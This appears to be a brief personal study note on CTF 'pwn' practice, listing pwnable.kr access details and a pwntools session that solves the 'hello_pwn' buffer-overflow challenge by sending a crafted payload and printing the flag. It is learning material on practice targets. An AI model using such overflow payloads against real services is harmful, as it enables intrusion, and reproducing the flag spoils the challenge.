7-21

pwn

参考:

  1. 一步一步学pwntools
  2. 看了他的“收获”部分:pwnable.kr—bof

pwnable.kr

  1. ssh fd@pwnable.kr -p2222 (pw:guest)
  2. Download : http://pwnable.kr/bin/bof
    Download : http://pwnable.kr/bin/bof.c
    Running at : nc pwnable.kr 9000

攻防世界

hello_pwn

1
2
3
4
5
6
7
8
9
10
>>> c = remote("220.249.52.133", 32177)
[x] Opening connection to 220.249.52.133 on port 32177
[x] Opening connection to 220.249.52.133 on port 32177: Trying 220.249.52.133
[+] Opening connection to 220.249.52.133 on port 32177: Done
>>> p = "0"*4 + p32(1853186401)
>>> c.sendline(p)
>>> print c.recv()
~~ welcome to ctf ~~
lets get helloworld for bof
cyberpeace{1f8655e6cb9571f219d21d9ba2051e74}